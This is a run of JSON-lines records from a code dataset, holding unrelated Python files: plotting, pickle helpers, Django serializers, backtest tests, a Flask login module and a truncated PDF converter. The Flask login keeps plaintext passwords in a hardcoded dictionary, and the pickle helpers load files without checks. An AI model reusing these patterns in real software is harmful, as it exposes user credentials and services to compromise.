+'_1e4.txt', float)#load the fitted radius\n #data1 = numpy.loadtxt('../PRadII_rebin/fit/fit_result/R11_PRadII_Model' + l +'_1e4.txt', float)\n #data1 = numpy.loadtxt('../global_fit_new/result/poly10_xsfit_RE_GMfromRatio_check_Model' + l +'.txt', float)\n #data1 = numpy.loadtxt('../global_fit_new/result/R11_xsfit_RE_GMisDipole_1GeV_1e3_Model' + l +'.txt', float)\n #data1 = numpy.loadtxt('../global_fit_new/result/R11_xsfit_RE_GMfromRatio_Model' + l +'.txt', float)\n #data1 = numpy.loadtxt('../global_fit_new/result/R11_xsfit_RE_GMRandom_Model' + l +'.txt', float)\n #radius = data1[:]\n #chi2 = data1[0,:]\n r = data1[:]\n i = 0\n radius = []\n while (i<10000):\n #while (i0.70 and r[i]<1.0):\n #if (r[i]>0.72 and r[i]<0.98):\n radius.append(r[i])\n i += 1\n R_mean = numpy.mean(radius)\n R_rms = numpy.std(radius)\n x.append(R_mean-R_input[j-1])\n rms.append(R_rms)\n RMSE.append(numpy.sqrt((R_mean-R_input[j-1])**2+R_rms**2))\n j += 1\nprint(i)\nprint(x)\nprint(rms)\n#print(numpy.mean(numpy.absolute(x)))\n#print(numpy.mean(rms))\n#print(numpy.mean(RMSE))\ni = 0\nN = 7\nsum_bias = 0.0\nsum_rms = 0.0\nsum_RMSE = 0.0\nwhile i<7:\n sum_bias = sum_bias + numpy.absolute(x[i])\n sum_rms = sum_rms + rms[i]\n sum_RMSE = sum_RMSE + RMSE[i]\n i += 1\nprint(sum_bias/7)\nprint(sum_rms/7)\nprint(sum_RMSE/7)\n#plt.figure(figsize=(3.5,5.5))\nplt.figure(figsize=(3.0,4.5))\n#plt.figure(figsize=(4.0,5.5))\n#fig = plt.Figure()\nax = plt.gca()\nax.xaxis.label.set_size(15)\n#plt.xlim((-0.1,0.1))\nplt.xlim((-0.08,0.08))\n#plt.xlim((-0.05,0.05))\n#plt.xlim((-0.16,0.16))\n#plt.ylim((0.5,7.5))\nplt.ylim((0.5,9.5))\nplt.grid(True)\nplt.xlabel(r'$\\delta R / fm$',fontsize=15)\n#plt.xticks([-0.12, -0.08, -0.04, 0, 0.04, 0.08, 0.12])\n#plt.xticks([-0.04, -0.02, 0, 0.02, 0.04])\n#plt.xticks([-0.04, -0.02, 0, 0.02, 0.04])\n#plt.xticks([-0.1, -0.05, 0, 0.05, 0.1])\n#plt.xticks([-0.2, -0.1, 0, 0.1, 0.2])\n#plt.xticks([-0.5, -0.25, 0, 0.25, 0.5])\nplt.yticks([])\n\n#y1 = np.linspace(0.5,7.5)\ny1 = np.linspace(0.5,9.5)\nx1 = y1-y1 \nplt.plot(x1,y1,linestyle=(0, (5, 5)),color='black')\n\n\n\n\nplt.title('CF (3)',loc='center', fontsize=15)\n#plt.title('PolynomialZ (3)',loc='center', fontsize=15)\n#plt.title('Rational (1,1)',loc='center', fontsize=15)\n#plt.title('Gaussian',loc='center', fontsize=15)\n\n#plt.title('Gaussian',loc='center',fontdict={'fontsize': 20, 'fontweight': 'medium'})\nplt.errorbar(x[0], y[0], xerr=rms[0], fmt ='o',color='black')#, color = 'r.')\nplt.errorbar(x[1], y[1], xerr=rms[1], fmt ='o',color='grey')#, color = 'b.')\nplt.errorbar(x[2], y[2], xerr=rms[2], fmt ='or')#, color = 'g.')\nplt.errorbar(x[3], y[3], xerr=rms[3], fmt ='o',color='salmon')#, color = 'k.')\nplt.errorbar(x[4], y[4], xerr=rms[4], fmt ='o',color='blue')#, color = 'm.')\nplt.errorbar(x[5], y[5], xerr=rms[5], fmt ='o',color='cornflowerblue')#, color = 'olive')\nplt.errorbar(x[6], y[6], xerr=rms[6], fmt ='o',color='magenta')#, color = 'brown')\nplt.errorbar(x[7], y[7], xerr=rms[7], fmt ='o',color='violet')#, color = 'teal')\nplt.errorbar(x[8], y[8], xerr=rms[8], fmt ='o',color='green')#, color = 'orange')\n#plt.errorbar(x[9], y[9], xerr=rms[9], fmt ='o')#, color = 'orange')\n\n\nplt.savefig(\"mygraph.png\")\n","sub_path":"analysis/count_draw.py","file_name":"count_draw.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"256833953","text":"# saves and reads our lists and dictionaries to files\n# for reference and speed up\n\nimport pickle\n\n# takes a list of posts and writes them to a file for reference\ndef write_list(file_name,text_list):\n\n f = open(file_name,'w')\n for post in text_list:\n post_str = post+\"\\n\\n\"\n f.write(post_str.encode(\"utf8\"))\n f.close()\n\n# takes an object and pickles it into a file for later use\ndef write_obj(file_name,obj):\n\n f = open(file_name,'w')\n pickle.dump(obj,f)\n f.close()\n\n# takes a pickled file and reads it into a variable\ndef read_obj(file_name):\n\n f = open(file_name,'r')\n obj = pickle.load(f)\n f.close()\n return obj\n","sub_path":"files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"369430892","text":"from rest_framework import serializers\n\nfrom papermerge.core.models import (Document, User)\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n documents = serializers.PrimaryKeyRelatedField(\n many=True, queryset=Document.objects.all()\n )\n\n class Meta:\n model = User\n fields = ['id', 'username', 'documents']\n\n\nclass DocumentSerializer(serializers.Serializer):\n id = serializers.IntegerField(read_only=True)\n title = serializers.CharField(\n required=False,\n allow_blank=True,\n max_length=100\n )\n notes = serializers.CharField(\n required=False,\n allow_blank=True,\n allow_null=True,\n max_length=100\n )\n page_count = serializers.IntegerField(\n read_only=True\n )\n\n user = serializers.ReadOnlyField(source='user.username')\n\n def update(self, instance, validated_data):\n \"\"\"\n Update and return an existing `Document` instance,\n given the validated data.\n \"\"\"\n instance.title = validated_data.get('title', instance.title)\n instance.notes = validated_data.get('notes', instance.notes)\n instance.save()\n\n return instance\n\n def create(self, validated_data):\n \"\"\"\n Create and return a new `Document` instance, given the validated data.\n \"\"\"\n return Document.objects.create(**validated_data)\n","sub_path":"papermerge/core/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"16548397","text":"file = open('znaki.txt', 'r')\nx = file.read().split('\\n')\nslowo = ''\nlista= []\nilosc = 0\nfor i in range (len(x)):\n for j in range(int(len(x[i])-1), -1, -1):\n slowo += x[i][j]\n lista.append(slowo)\n slowo = ''\n if x[i] == lista[i]:\n ilosc += 1\n palidrom = open('palindrom.txt', 'a')\n palidrom.write(x[i] + '\\n')\npalidrom.close()\nfile.close()\nprint(\"palindromow jest: \", ilosc)","sub_path":"lab12/cw_08.py","file_name":"cw_08.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"426118383","text":"# encoding: utf-8\n\nimport os\nimport torch\n\n# print(os.getcwd())\n# import sys\n# print(sys.path)\n\nfrom model import BERTClass\n\n# import torch\n# import transformers\n\n\n# class BERTClass(torch.nn.Module):\n# \n# def __init__(self):\n# super(BERTClass, self).__init__()\n# self.l1 = transformers.BertModel.from_pretrained(model_name)\n# self.l2 = torch.nn.Dropout(0.3)\n# self.l3 = torch.nn.Linear(768, len(mlb.classes_))\n# \n# \n# def forward(self, ids, mask, token_type_ids):\n# output_1 = self.l1(ids, attention_mask = mask, token_type_ids = token_type_ids)\n# output_2 = self.l2(output_1.pooler_output)\n# output = self.l3(output_2)\n# return output\n\n\npath = os.path.dirname(__file__)\n\nmodel_file = os.path.join(path, 'model/chinese-bert-wwm-ext-4.bin')\nmodel = torch.load(model_file)\nmodel.to('cpu')\n\n\n# output_model_file = model_file.rstrip('.bin') + '-cpu.bin'\n# torch.save(model, output_model_file)\n\noutput_model_file = model_file.rstrip('.bin') + '-cpu.sd'\ntorch.save(model.state_dict(), output_model_file)\n\nprint('saved')\n","sub_path":"topic_modeling/model_convert.py","file_name":"model_convert.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"519094079","text":"# -*- coding: utf-8 -*-\n##\n# @file test_blotter.py\n# @brief 测试模拟器的价格撮合, 当前持仓,权益,可用资金等。\n# @author wondereamer\n# @version 0.3\n# @date 2015-12-22\n\n\nimport datetime\nimport unittest\nimport pandas as pd\nimport os\nimport talib\nimport numpy as np\nfrom logbook import Logger\nfrom quantdigger.engine.qd import *\nfrom quantdigger.engine.series import NumberSeries, DateTimeSeries\n\nlogger = Logger('test')\nwindow_size = 0\nCAPTIAL = 200000\nOFFSET = 0.6\nbuy1 = datetime.datetime.strptime(\"09:01:00\", \"%H:%M:%S\").time()\nbuy2 = datetime.datetime.strptime(\"09:02:00\", \"%H:%M:%S\").time()\nbuy3 = datetime.datetime.strptime(\"09:03:00\", \"%H:%M:%S\").time()\nsell1 = datetime.datetime.strptime(\"14:57:00\", \"%H:%M:%S\").time()\nsell2 = datetime.datetime.strptime(\"14:58:00\", \"%H:%M:%S\").time()\nsell3 = datetime.datetime.strptime(\"15:00:00\", \"%H:%M:%S\").time()\n\n\nclass TestOneDataOneCombination(unittest.TestCase):\n \"\"\" 测试单数据单组合的价格撮合,持仓,可用资金等交易接口 \"\"\"\n \n def test_case(self):\n # @todo profile\n #signals 盈利\n\n # @TODO deals DemoStrategy2\n cashes0, cashes1 = [], []\n\n class DemoStrategy1(Strategy):\n \"\"\" 只买多头仓位的策略 \"\"\"\n \n def on_init(self, ctx):\n \"\"\"初始化数据\"\"\" \n pass\n\n def on_bar(self, ctx):\n curtime = ctx.datetime[0].time()\n if curtime in [buy1, buy2, buy3]:\n ctx.buy(ctx.close, 1) \n else:\n if curtime == sell1:\n assert(ctx.position() == 3 and '持仓测试失败!')\n ctx.sell(ctx.close, 2) \n elif curtime == sell2:\n assert(ctx.position() == 1 and '持仓测试失败!')\n ctx.sell(ctx.close, 1) \n ## @note 前一根的交易信号在当前价格撮合后的可用资金\n cashes0.append(ctx.test_cash()) \n\n\n class DemoStrategy2(Strategy):\n \"\"\" 买多卖空的策略 \"\"\"\n \n def on_init(self, ctx):\n \"\"\"初始化数据\"\"\" \n pass\n\n def on_bar(self, ctx):\n curtime = ctx.datetime[0].time()\n if curtime in [buy1, buy2, buy3]:\n ctx.buy(ctx.close, 1) \n ctx.short(ctx.close, 2) \n else:\n if curtime == sell1:\n assert(ctx.position('long') == 3 and '持仓测试失败!')\n ctx.sell(ctx.close, 2) \n assert(ctx.position('short') == 6 and '持仓测试失败!')\n ctx.cover(ctx.close, 4) \n elif curtime == sell2:\n assert(ctx.position('long') == 1 and '持仓测试失败!')\n ctx.sell(ctx.close, 1) \n assert(ctx.position('short') == 2 and '持仓测试失败!')\n ctx.cover(ctx.close, 2) \n cashes1.append(ctx.test_cash()) \n\n set_symbols(['blotter.SHFE-1.Minute'], window_size)\n profile = add_strategy([DemoStrategy1('A1'), DemoStrategy2('A2')], {\n 'captial': CAPTIAL,\n 'ratio': [0.5, 0.5]\n })\n run()\n # all_holding\n fname = os.path.join(os.getcwd(), 'data', 'blotter.SHFE-1.Minute.csv')\n source = pd.read_csv(fname, parse_dates=True, index_col=0)\n self.assertTrue(len(source) > 0 and \n len(source) == len(profile.all_holdings(0)), '模拟器测试失败!')\n self.assertTrue(len(source) > 0 and \n len(source) == len(profile.all_holdings(1)), '模拟器测试失败!')\n # cash()\n target, cashes, dts = target_all_holding1(source, CAPTIAL/2)\n for i in range(0, len(cashes0)-1): # 最后一根强平了无法比较\n self.assertTrue(np.isclose(cashes0[i],cashes[i]), 'cash接口测试失败!')\n self.assertTrue(len(cashes0) == len(cashes), 'cash接口测试失败!')\n self.assertTrue(len(profile.all_holdings(0)) == len(target) and\n len(target) > 0, 'all_holdings接口测试失败!')\n\n for i, hd in enumerate(profile.all_holdings(0)):\n self.assertTrue(hd['datetime'] == dts[i], 'all_holdings接口测试失败!')\n self.assertTrue(np.isclose(hd['equity'], target[i]), 'all_holdings接口测试失败!')\n\n target2, cashes, dts = target_all_holding2(source, CAPTIAL/2)\n self.assertTrue(len(profile.all_holdings(1)) == len(target2) and \n len(target2) > 0, 'all_holdings接口测试失败!')\n for i in range(0, len(cashes1)-1): # 最后一根强平了无法比较\n self.assertTrue(np.isclose(cashes1[i],cashes[i]), 'cash接口测试失败!')\n self.assertTrue(len(cashes1) == len(cashes), 'cash接口测试失败!')\n for i, hd in enumerate(profile.all_holdings(1)):\n self.assertTrue(np.isclose(target[i]-CAPTIAL/2,\n 0-(target2[i]-CAPTIAL/2)), '测试代码错误!')\n self.assertTrue(hd['datetime'] == dts[i], 'all_holdings接口测试失败!')\n self.assertTrue(np.isclose(hd['equity'], target2[i]), 'all_holdings接口测试失败!')\n #\n hd0 = profile.holding(0) \n hd1 = profile.holding(1) \n hd = profile.holding()\n self.assertTrue(hd0['equity']+hd1['equity']==hd['equity'], 'holdings接口测试失败!')\n self.assertTrue(hd0['cash']+hd1['cash']==hd['cash'], 'holdings接口测试失败!')\n self.assertTrue(hd0['commission']+hd1['commission']==hd['commission'], 'holdings接口测试失败!')\n self.assertTrue(hd0['history_profit']+hd1['history_profit']==hd['history_profit'], 'holdings接口测试失败!')\n hd0last = profile.all_holdings(0)[-1]\n self.assertTrue(hd0last['equity'] == hd0['equity'], 'holdings接口测试失败!')\n self.assertTrue(hd0last['cash'] == hd0['cash'], 'holdings接口测试失败!')\n self.assertTrue(hd0last['commission'] == hd0['commission'], 'holdings接口测试失败!')\n self.assertTrue(len(profile.all_holdings()) == len(target) and\n len(target) > 0, 'holdings接口测试失败!')\n #\n ## @TODO \n all_holdings = profile.all_holdings()\n all_holdings0 = profile.all_holdings(0)\n all_holdings1 = profile.all_holdings(1)\n for i in range(0, len(profile.all_holdings())):\n hd = all_holdings[i]\n hd0 = all_holdings0[i]\n hd1 = all_holdings1[i]\n self.assertTrue(hd['cash'] == hd0['cash'] + hd1['cash'] , 'all_holdings接口测试失败!')\n self.assertTrue(hd['commission'] == hd0['commission'] +\n hd1['commission'], 'all_holdings接口测试失败!')\n self.assertTrue(hd['equity'] == hd0['equity'] + hd1['equity'], 'all_holdings接口测试失败!')\n \n ## 绘制k线,交易信号线\n #from quantdigger.digger import finance, plotting\n #plotting.plot_strategy(profile.data(), deals=profile.deals(1))\n\n\n def test_case2(self):\n \"\"\" 测试限价的延迟成交 \"\"\"\n buy_entries, sell_entries = [], []\n short_entries, cover_entries = [], []\n\n class DemoStrategyBuy(Strategy):\n \"\"\" 只开多头仓位的策略 \"\"\"\n \n def on_init(self, ctx):\n \"\"\"初始化数据\"\"\" \n pass\n\n def on_bar(self, ctx):\n if ctx.datetime[0] in buy_entries:\n ctx.buy(ctx.low-OFFSET, 1) \n # 默认多头\n elif ctx.position() > 0 and ctx.datetime[0].time() == sell1:\n ctx.sell(ctx.close, ctx.position()) \n\n class DemoStrategyShort(Strategy):\n \"\"\" 只开空头仓位的策略 \"\"\"\n \n def on_init(self, ctx):\n \"\"\"初始化数据\"\"\" \n pass\n\n def on_bar(self, ctx):\n if ctx.datetime[0] in short_entries:\n ctx.short(ctx.high+OFFSET, 1) \n elif ctx.position('short') > 0 and ctx.datetime[0].time() == sell1:\n ctx.cover(ctx.close, ctx.position('short')) \n\n class DemoStrategySell(Strategy):\n \"\"\" 只开多头仓位的策略 \"\"\"\n \n def on_init(self, ctx):\n \"\"\"初始化数据\"\"\" \n pass\n\n def on_bar(self, ctx):\n if ctx.datetime[0].time() == buy1:\n ctx.buy(ctx.close, 1) \n elif ctx.position('long') > 0 and ctx.datetime[0] in sell_entries:\n ctx.sell(ctx.high+OFFSET, ctx.position()) \n ## @TODO 隔夜测试\n elif ctx.position('long') > 0 and ctx.datetime[0].time() == sell3:\n ctx.sell(ctx.close, ctx.position()) \n\n class DemoStrategyCover(Strategy):\n \"\"\" 只买多头仓位的策略 \"\"\"\n \n def on_init(self, ctx):\n \"\"\"初始化数据\"\"\" \n pass\n\n def on_bar(self, ctx):\n if ctx.datetime[0].time() == buy1:\n ctx.short(ctx.close, 1) \n elif ctx.position('short') > 0 and ctx.datetime[0] in cover_entries:\n ctx.cover(ctx.low-OFFSET, ctx.position('short')) \n elif ctx.position('short') > 0 and ctx.datetime[0].time() == sell3:\n ctx.cover(ctx.close, ctx.position('short')) \n\n set_symbols(['blotter.SHFE-1.Minute'], window_size)\n profile = add_strategy([DemoStrategyBuy('A1'), DemoStrategySell('A2'),\n DemoStrategyShort('A3'), DemoStrategyCover('A4')],{\n 'captial': CAPTIAL,\n 'ratio': [0.25, 0.25, 0.25, 0.25]\n })\n\n fname = os.path.join(os.getcwd(), 'data', 'blotter.SHFE-1.Minute.csv')\n source = pd.read_csv(fname, parse_dates=True, index_col=0)\n buy_entries, sell_entries, short_entries, cover_entries = findTradingPoint(source)\n run()\n # buy\n target, dts = target_all_holding_buy(source, buy_entries, CAPTIAL/4)\n self.assertTrue(len(profile.all_holdings(0)) == len(target) and\n len(target) > 0, '模拟器测试失败!')\n for i, hd in enumerate(profile.all_holdings(0)):\n self.assertTrue(hd['datetime'] == dts[i], '模拟器测试失败!')\n self.assertTrue(np.isclose(hd['equity'], target[i]), '模拟器测试失败!')\n # short\n target, dts = target_all_holding_short(source, short_entries, CAPTIAL/4)\n self.assertTrue(len(profile.all_holdings(2)) == len(target) and\n len(target) > 0, '模拟器测试失败!')\n for i, hd in enumerate(profile.all_holdings(2)):\n self.assertTrue(hd['datetime'] == dts[i], '模拟器测试失败!')\n self.assertTrue(np.isclose(hd['equity'], target[i]), '模拟器测试失败!')\n # sell\n target, dts = target_all_holding_sell(source, sell_entries, CAPTIAL/4)\n self.assertTrue(len(profile.all_holdings(1)) == len(target) and\n len(target) > 0, '模拟器测试失败!')\n for i, hd in enumerate(profile.all_holdings(1)):\n self.assertTrue(hd['datetime'] == dts[i], '模拟器测试失败!')\n self.assertTrue(np.isclose(hd['equity'], target[i]), '模拟器测试失败!')\n\n # cover\n target, dts = target_all_holding_cover(source, cover_entries, CAPTIAL/4)\n self.assertTrue(len(profile.all_holdings(3)) == len(target) and\n len(target) > 0, '模拟器测试失败!')\n for i, hd in enumerate(profile.all_holdings(3)):\n self.assertTrue(hd['datetime'] == dts[i], '模拟器测试失败!')\n self.assertTrue(np.isclose(hd['equity'], target[i]), '模拟器测试失败!')\n\n #from quantdigger.digger import plotting\n #plotting.plot_strategy(profile.data(), deals=profile.deals(3))\n\n ## @TODO 模拟器make_market的运行次数\n ## @TODO 跨日订单的清空\n return\n\ndef target_all_holding1(data, captial):\n buy_prices= []\n close_profit = 0\n equities = [] # 累计平仓盈亏\n dts = []\n cashes = []\n for dt, price in data.close.iteritems():\n curtime = dt.time()\n if curtime in [buy1, buy2, buy3]:\n buy_prices.append(price)\n else:\n if curtime == sell1:\n assert(len(buy_prices) == 3)\n profit = (price-buy_prices[0]) + (price-buy_prices[1])\n close_profit += profit\n buy_prices = buy_prices[-1:]\n elif curtime == sell2:\n assert(len(buy_prices) == 1)\n close_profit += (price - buy_prices[0])\n buy_prices = []\n if dt == data.index[-1]:\n # 强平现有持仓\n for bp in buy_prices:\n close_profit += (price - bp)\n buy_prices = []\n pos_profit = sum([price-pos_price for pos_price in buy_prices]) # 持仓盈亏\n #cost = sum(buy_prices) # 股票持仓成本\n cost = price * len(buy_prices) * 1 # 保证金为比例为1的期货持仓成本。\n equities.append(captial+close_profit+pos_profit)\n cashes.append(equities[-1]-cost)\n dts.append(dt)\n return equities, cashes, dts\n\ndef target_all_holding2(data, captial):\n buy_prices= []\n short_prices = []\n close_profit = 0\n equities = [] # 累计平仓盈亏\n dts = []\n cashes = []\n for dt, price in data.close.iteritems():\n curtime = dt.time()\n if curtime in [buy1, buy2, buy3]:\n buy_prices.append(price)\n short_prices.append(price)\n short_prices.append(price)\n else:\n if curtime == sell1:\n assert(len(buy_prices) == 3)\n profit = (price-buy_prices[0]) + (price-buy_prices[1])\n close_profit += profit\n buy_prices = buy_prices[-1:]\n assert(len(short_prices) == 6)\n profit = (price-short_prices[0]) + (price-short_prices[1]) + \\\n (price-short_prices[2]) + (price-short_prices[3])\n close_profit -= profit\n short_prices = short_prices[-2:]\n elif curtime == sell2:\n assert(len(buy_prices) == 1)\n close_profit += (price - buy_prices[0])\n buy_prices = []\n assert(len(short_prices) == 2)\n close_profit -= (price - short_prices[0])\n close_profit -= (price - short_prices[1])\n buy_prices = []\n short_prices = []\n if dt == data.index[-1]:\n # 强平现有持仓\n for bp in buy_prices:\n close_profit += (price - bp)\n for bp in short_prices:\n close_profit -= (price - bp)\n buy_prices = []\n short_prices = []\n pos_profit = sum([price-pos_price for pos_price in buy_prices]) # 持仓盈亏\n pos_profit -= sum([price-pos_price for pos_price in short_prices]) # 持仓盈亏\n equities.append(captial+close_profit+pos_profit)\n ## @TODO 股票测试\n cost = price * len(buy_prices) * 1 # 保证金为比例为1的期货持仓成本。\n cost += price * len(short_prices) * 1 \n cashes.append(equities[-1]-cost)\n dts.append(dt)\n return equities, cashes, dts\n\n\ndef findTradingPoint(data):\n buy_entries = []\n sell_entries = []\n short_entries = []\n cover_entries = []\n prehigh = data.high[0]\n predt = data.index[0]\n prelow = data.low[0]\n\n for dt, low in data.low.iteritems():\n if dt.date() == predt.date() and dt.time() < sell1 and prelow - low >= OFFSET:\n buy_entries.append(predt)\n prelow = low\n predt = dt\n\n for dt, high in data.high.iteritems():\n if dt.date() == predt.date() and dt.time() < sell1 and high - prehigh >= OFFSET:\n short_entries.append(predt)\n #print predt, low-prelow\n prehigh = high\n predt = dt\n\n for dt, high in data.high.iteritems():\n if dt.time() > buy3 and high - prehigh >= OFFSET:\n sell_entries.append(predt)\n #print predt, high-prehigh\n prehigh = high\n predt = dt\n\n for dt, low in data.low.iteritems():\n if dt.time() > buy3 and prelow - low >= OFFSET:\n cover_entries.append(predt)\n #print predt, low-prelow\n prelow = low\n predt = dt\n return buy_entries, sell_entries, short_entries, cover_entries\n\ndef target_all_holding_buy(data, buy_entries, captial):\n \"\"\" 返回策略多头限价开仓超过当前bar价格范围的历史资金状况 \"\"\" \n buy_prices= []\n close_profit = 0 # 累计平仓盈亏\n equities = [] \n dts = []\n prelow = data.low[0]\n trans_entries = map(lambda x: x+datetime.timedelta(minutes = 1), buy_entries)\n for dt, low in data.low.iteritems():\n curtime = dt.time()\n close = data.close[dt]\n if dt in trans_entries:\n buy_prices.append(prelow-OFFSET)\n elif curtime == sell1:\n for bprice in buy_prices:\n close_profit += (close-bprice)\n buy_prices = buy_prices[-1:]\n buy_prices = []\n elif dt == data.index[-1]:\n # 最后一根,强平现有持仓\n for bp in buy_prices:\n close_profit += (close - bp)\n buy_prices = []\n pos_profit = 0 # 持仓盈亏\n for pos_price in buy_prices:\n pos_profit += (close - pos_price)\n equities.append(close_profit+pos_profit+captial)\n dts.append(dt)\n prelow = low\n return equities, dts\n\ndef target_all_holding_short(data, buy_entries, captial):\n \"\"\" 返回策略空头限价开仓超过当前bar价格范围的历史资金状况 \"\"\" \n buy_prices= []\n close_profit = 0 # 累计平仓盈亏\n equities = [] \n dts = []\n prehigh = data.high[0]\n trans_entries = map(lambda x: x+datetime.timedelta(minutes = 1), buy_entries)\n for dt, high in data.high.iteritems():\n curtime = dt.time()\n close = data.close[dt]\n if dt in trans_entries:\n buy_prices.append(prehigh+OFFSET)\n elif curtime == sell1:\n for bprice in buy_prices:\n close_profit -= (close-bprice)\n buy_prices = buy_prices[-1:]\n buy_prices = []\n elif dt == data.index[-1]:\n # 最后一根,强平现有持仓\n for bp in buy_prices:\n close_profit -= (close - bp)\n buy_prices = []\n pos_profit = 0 # 持仓盈亏\n for pos_price in buy_prices:\n pos_profit -= (close - pos_price)\n #print dt, pos_profit, close\n #print buy_prices\n equities.append(close_profit+pos_profit+captial)\n dts.append(dt)\n prehigh = high\n return equities, dts\n\ndef target_all_holding_sell(data, sell_entries, captial):\n \"\"\" 返回策略多头限价平仓超过当前bar价格范围的历史资金状况 \"\"\" \n buy_prices = []\n close_profit = 0 # 累计平仓盈亏\n equities = [] \n dts = []\n trans_entries = map(lambda x: x+datetime.timedelta(minutes = 1), sell_entries)\n bprice = None\n prehigh = data.high[0]\n for dt, high in data.high.iteritems():\n close = data.close[dt]\n if dt.time() == buy1:\n bprice = close\n elif bprice and dt in trans_entries:\n close_profit += (prehigh+OFFSET-bprice)\n bprice = None\n elif dt == data.index[-1]:\n # 最后一根, 强平现有持仓\n if bprice:\n close_profit += (close - bprice)\n bprice = None\n elif dt.time () == sell3:\n # 不隔日\n if bprice:\n close_profit += (close - bprice)\n bprice = None\n pos_profit = 0 # 持仓盈亏\n if bprice:\n pos_profit += (close - bprice)\n equities.append(close_profit+pos_profit+captial)\n dts.append(dt)\n prehigh = high\n return equities, dts\n\ndef target_all_holding_cover(data, cover_entries, captial):\n \"\"\" 返回策略空头限价平仓超过当前bar价格范围的历史资金状况 \"\"\" \n ## @TODO 11号无法成交,可用来测试“去隔夜单”\n buy_prices = []\n close_profit = 0 # 累计平仓盈亏\n equities = [] \n dts = []\n trans_entries = map(lambda x: x+datetime.timedelta(minutes = 1), cover_entries)\n bprice = None\n prelow = data.low[0]\n for dt, low in data.low.iteritems():\n close = data.close[dt]\n if dt.time() == buy1:\n bprice = close\n elif bprice and dt in trans_entries:\n close_profit -= (prelow-OFFSET-bprice)\n bprice = None\n elif dt == data.index[-1]:\n # 最后一根, 强平现有持仓\n if bprice:\n close_profit -= (close - bprice)\n bprice = None\n elif dt.time () == sell3:\n # 不隔日\n if bprice:\n close_profit -= (close - bprice)\n bprice = None\n pos_profit = 0 # 持仓盈亏\n if bprice:\n pos_profit -= (close - bprice)\n equities.append(close_profit+pos_profit+captial)\n dts.append(dt)\n prelow = low\n return equities, dts\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"quantdigger/tests/test_blotter.py","file_name":"test_blotter.py","file_ext":"py","file_size_in_byte":21988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"605884082","text":"# -*- coding: utf-8 -*-\n\nfrom flask import request, render_template, Blueprint, session, redirect, url_for\nfrom flask.ext.login import LoginManager, UserMixin, login_required, login_user, logout_user, current_user\n\ncckm_login_blueprint = Blueprint('auth', __name__)\n\nlogin_manager = LoginManager()\nlogin_manager.login_view = \"/login\"\n\nusers = {\n \"Jennifer\": (\"Jennifer\", \"jennifer_chuang\"),\n \"Jason\": (\"Jason\", \"jason_hsu\"),\n \"Naboson\": (\"Naboson\", \"naboson_chen\"),\n \"Jean\": (\"Jean\", \"jean_tu\")\n}\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User(user_id)\n\n\nclass User(UserMixin):\n def __init__(self, id, active=True):\n self.id = id\n self.active = active\n\n def is_active(self):\n # Here you should write whatever the code is\n # that checks the database if your user is active\n return self.active\n\n def is_anonymous(self):\n return False\n\n def is_authenticated(self):\n return True\n\n\n@cckm_login_blueprint.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if current_user is not None and current_user.is_authenticated:\n return redirect(url_for('dashboard.get_dashboard'))\n\n if request.method == 'GET':\n return render_template('login_2.html')\n\n username = request.form['form-username']\n password = request.form['form-password']\n\n if users.get(username) is not None and users.get(username)[1] == password:\n user = User(username)\n login_user(user, remember=True)\n session['username'] = username\n return redirect(url_for('dashboard.get_dashboard'))\n return render_template('login_2.html', error_msg='帳號或密碼錯誤,請重新登入。')\n\n@cckm_login_blueprint.route(\"/logout\")\ndef logout():\n logout_user()\n session.pop('username', None)\n return render_template('login_2.html', info_msg='登出成功,請重新登入。')\n\n\ndef verify_user_login():\n if current_user is not None and current_user.is_authenticated:\n return redirect(url_for('dashboard.get_dashboard'))","sub_path":"cckm/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"268437574","text":"#!/usr/bin/env python\n\nimport sys, os\nimport re\nimport urllib2, lxml.etree\nfrom optparse import OptionParser\nimport pdb\nimport itertools\nimport operator\nimport csv\nfrom operator import itemgetter\nimport glob\n\nparser = OptionParser()\nparser.add_option(\"-i\", \"--input\", dest=\"input\", default=\"S:/Projects/Programme resources/Data/Data sets/Domestic Government Expenditure/Government budgets/Uganda/Missing PDFs/Tororo MC Q3.pdf\",\n help=\"Input pdf name\", metavar=\"FILE\")\nparser.add_option(\"-o\", \"--output\", dest=\"output\", default=\"S:/Projects/Programme resources/Data/Data sets/Domestic Government Expenditure/Government budgets/Uganda/Missing PDFs/Data/Tororo_MC_2013-14.csv\",\n help=\"Output path. Default is './'\",metavar=\"FOLDER\")\nparser.add_option(\"-d\", \"--debug\", dest=\"debug\", default=False,\n help=\"Debug\",metavar=\"BOOLEAN\")\n(options, args) = parser.parse_args()\n\ndef remdash(string):\n return unicode(string.replace(u'\\u2013',\"-\")).encode('utf-8')\ndef trytext(el):\n textList = []\n text = el.text\n childText = None\n grandchildText = None\n children = el.getchildren()\n childLen = len(children)\n if childLen>0:\n child = children[0]\n childText = child.text\n grandchildren = child.getchildren()\n grandchildLen = len(grandchildren)\n if grandchildLen>0:\n grandchild = grandchildren[0]\n grandchildText = grandchild.text\n result = \"\"\n textList.append(text)\n textList.append(childText)\n textList.append(grandchildText)\n finalList = filter(None,textList)\n result = \" \".join(finalList)\n output = remdash(result)\n if output==\"\":\n return None\n else:\n return output\n \ndef pdftoxml(pdfdata, options):\n \"\"\"converts pdf file to xml file\"\"\"\n # lots of hacky Windows fixes c.f. original\n basename = os.path.basename(pdfdata)\n inputname, inputextension = os.path.splitext(basename)\n absDir = os.path.dirname(pdfdata)+\"/\"\n cmd = 